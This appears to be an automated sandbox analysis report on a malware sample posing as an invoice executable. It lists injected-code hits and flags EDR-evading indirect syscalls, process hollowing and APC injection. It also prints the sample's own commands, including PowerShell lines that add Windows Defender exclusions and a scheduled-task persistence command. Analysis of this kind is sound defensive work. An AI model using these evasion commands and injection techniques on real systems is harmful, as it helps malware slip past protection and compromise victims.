Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192CCA0 mov eax, dword ptr fs:[00000030h]	9_2_0192CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0192CCA0 mov eax, dword ptr fs:[00000030h]	9_2_0192CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934CA8 mov eax, dword ptr fs:[00000030h]	9_2_01934CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D8CB1 mov eax, dword ptr fs:[00000030h]	9_2_018D8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D8CB1 mov eax, dword ptr fs:[00000030h]	9_2_018D8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ACCC8 mov eax, dword ptr fs:[00000030h]	9_2_018ACCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2CDC mov eax, dword ptr fs:[00000030h]	9_2_018C2CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2CDC mov eax, dword ptr fs:[00000030h]	9_2_018C2CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2CDC mov eax, dword ptr fs:[00000030h]	9_2_018C2CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8CD0 mov eax, dword ptr fs:[00000030h]	9_2_018A8CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2CF0 mov eax, dword ptr fs:[00000030h]	9_2_018E2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2CF0 mov eax, dword ptr fs:[00000030h]	9_2_018E2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2CF0 mov eax, dword ptr fs:[00000030h]	9_2_018E2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2CF0 mov eax, dword ptr fs:[00000030h]	9_2_018E2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0C00 mov eax, dword ptr fs:[00000030h]	9_2_018C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0C00 mov eax, dword ptr fs:[00000030h]	9_2_018C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0C00 mov eax, dword ptr fs:[00000030h]	9_2_018C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C0C00 mov eax, dword ptr fs:[00000030h]	9_2_018C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECC00 mov eax, dword ptr fs:[00000030h]	9_2_018ECC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01934C0F mov eax, dword ptr fs:[00000030h]	9_2_01934C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AEC20 mov eax, dword ptr fs:[00000030h]	9_2_018AEC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D0C44 mov eax, dword ptr fs:[00000030h]	9_2_018D0C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018D0C44 mov eax, dword ptr fs:[00000030h]	9_2_018D0C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E4C59 mov eax, dword ptr fs:[00000030h]	9_2_018E4C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BAC50 mov eax, dword ptr fs:[00000030h]	9_2_018BAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BAC50 mov eax, dword ptr fs:[00000030h]	9_2_018BAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BAC50 mov eax, dword ptr fs:[00000030h]	9_2_018BAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BAC50 mov eax, dword ptr fs:[00000030h]	9_2_018BAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BAC50 mov eax, dword ptr fs:[00000030h]	9_2_018BAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BAC50 mov eax, dword ptr fs:[00000030h]	9_2_018BAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6C50 mov eax, dword ptr fs:[00000030h]	9_2_018B6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6C50 mov eax, dword ptr fs:[00000030h]	9_2_018B6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B6C50 mov eax, dword ptr fs:[00000030h]	9_2_018B6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BCC74 mov eax, dword ptr fs:[00000030h]	9_2_018BCC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018BEF8D mov eax, dword ptr fs:[00000030h]	9_2_018BEF8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECF80 mov eax, dword ptr fs:[00000030h]	9_2_018ECF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2F98 mov eax, dword ptr fs:[00000030h]	9_2_018E2F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018E2F98 mov eax, dword ptr fs:[00000030h]	9_2_018E2F98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018C2FB8 mov eax, dword ptr fs:[00000030h]	9_2_018C2FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2FC8 mov eax, dword ptr fs:[00000030h]	9_2_018B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2FC8 mov eax, dword ptr fs:[00000030h]	9_2_018B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2FC8 mov eax, dword ptr fs:[00000030h]	9_2_018B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2FC8 mov eax, dword ptr fs:[00000030h]	9_2_018B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01912FD6 mov eax, dword ptr fs:[00000030h]	9_2_01912FD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01912FDB mov eax, dword ptr fs:[00000030h]	9_2_01912FDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AEFD8 mov eax, dword ptr fs:[00000030h]	9_2_018AEFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AEFD8 mov eax, dword ptr fs:[00000030h]	9_2_018AEFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018AEFD8 mov eax, dword ptr fs:[00000030h]	9_2_018AEFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F0FF6 mov eax, dword ptr fs:[00000030h]	9_2_018F0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F0FF6 mov eax, dword ptr fs:[00000030h]	9_2_018F0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F0FF6 mov eax, dword ptr fs:[00000030h]	9_2_018F0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F0FF6 mov eax, dword ptr fs:[00000030h]	9_2_018F0FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8FF0 mov ecx, dword ptr fs:[00000030h]	9_2_018A8FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018A8FF0 mov eax, dword ptr fs:[00000030h]	9_2_018A8FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018F4F03 mov eax, dword ptr fs:[00000030h]	9_2_018F4F03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018ECF1F mov eax, dword ptr fs:[00000030h]	9_2_018ECF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018B2F12 mov eax, dword ptr fs:[00000030h]	9_2_018B2F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_018DEF28 mov eax, dword ptr fs:[00000030h]	9_2_018DEF28

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: 16_2_00D92167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree,

16_2_00D92167

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D95DC0 SetUnhandledExceptionFilter,		16_2_00D95DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 16_2_00D95C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		16_2_00D95C30

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe"
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe"
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtQueueApcThread: Indirect: 0x1A1A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtClose: Indirect: 0x1A1A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtClose: Indirect: 0x184A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	NtQueueApcThread: Indirect: 0x184A4F2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Invoice and packing list.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread register set: target process: 1028	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread register set: target process: 1028
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 1028

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 650000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: D90000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 10D8008	Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe

16_2_00D938D2

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice and packing list.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\utlAHqvw.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp2498.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\utlAHqvw" /XML "C:\Users\user\AppData\Local\Temp\tmp36E8.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\utlAHqvw.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Code function: 16_2_00D958B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

16_2_00D958B6

Source: explorer.exe, 0000000A.00000003.3095073919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2056890977.0000000009B9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4494783707.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 0000000A.00000000.2041967883.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483060673.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.2045537723.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2041967883.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483060673.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.2041967883.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483060673.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.2041967883.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483060673.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.2038920370.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4482316176.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\Invoice and packing list.exe	Queries volume information: C:\Users\user\Desktop\Invoice and packing list.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice and packing list.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
